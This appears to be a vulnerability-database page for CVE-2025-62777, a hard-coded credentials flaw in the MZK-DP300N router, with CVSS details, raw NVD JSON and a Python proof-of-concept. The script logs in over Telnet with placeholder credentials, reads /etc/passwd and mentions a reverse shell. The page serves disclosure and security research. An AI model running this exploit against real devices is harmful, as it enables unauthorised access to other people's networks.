Security Vulnerability Report
中文
CVE-2025-62777 CVSS 8.8 HIGH

CVE-2025-62777

Published: 2025-10-28 05:15:49
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Use of Hard-Coded Credentials issue exists in MZK-DP300N version 1.07 and earlier, which may allow an attacker within the local network to log in to the affected device via Telnet and execute arbitrary commands.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

MZK-DP300N <= 1.07

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-62777 PoC - MZK-DP300N Hard-coded Credentials Exploit Target: MZK-DP300N < = 1.07 Attack Vector: Telnet with hard-coded credentials CVSS: 8.8 (High) """ import socket import sys import time def exploit_telnet(target_ip, username, password): """ Connect to MZK-DP300N via Telnet using hard-coded credentials and execute arbitrary commands. """ try: # Connect to Telnet service sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, 23)) # Read initial banner banner = sock.recv(1024) print(f"[+] Received banner: {banner.decode('utf-8', errors='ignore')}") # Login process time.sleep(1) sock.sendall(username.encode() + b'\n') time.sleep(0.5) sock.sendall(password.encode() + b'\n') time.sleep(1) # Check if login successful response = sock.recv(4096) print(f"[+] Login response: {response.decode('utf-8', errors='ignore')}") if b'#' in response or b'$' in response or b'BusyBox' in response: print("[+] Login successful! Executing commands...") # Execute arbitrary command cmd = b'cat /etc/passwd\n' sock.sendall(cmd) time.sleep(1) output = sock.recv(4096) print(f"[+] Command output:\n{output.decode('utf-8', errors='ignore')}") # Execute reverse shell or other commands as needed return True else: print("[-] Login failed!") return False except Exception as e: print(f"[-] Error: {str(e)}") return False finally: sock.close() def main(): if len(sys.argv) < 2: print("Usage: python3 cve_2025_62777.py <target_ip>") print("Example: python3 cve_2025_62777.py 192.168.1.1") sys.exit(1) target = sys.argv[1] # Hard-coded credentials for MZK-DP300N (to be extracted from firmware) # Note: Actual credentials should be extracted from the vulnerable firmware hardcoded_user = "admin" # Example credential hardcoded_pass = "password" # Example credential print(f"[*] Exploiting CVE-2025-62777 on {target}") print(f"[*] Using hard-coded credentials: {hardcoded_user}:{hardcoded_pass}") exploit_telnet(target, hardcoded_user, hardcoded_pass) if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62777", "sourceIdentifier": "[email protected]", "published": "2025-10-28T05:15:48.750", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use of Hard-Coded Credentials issue exists in MZK-DP300N version 1.07 and earlier, which may allow an attacker within the local network to log in to the affected device via Telnet and execute arbitrary commands."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN00021602/", "source": "[email protected]"}, {"url": "https://www.planex.co.jp/products/mzk-dp300n/", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.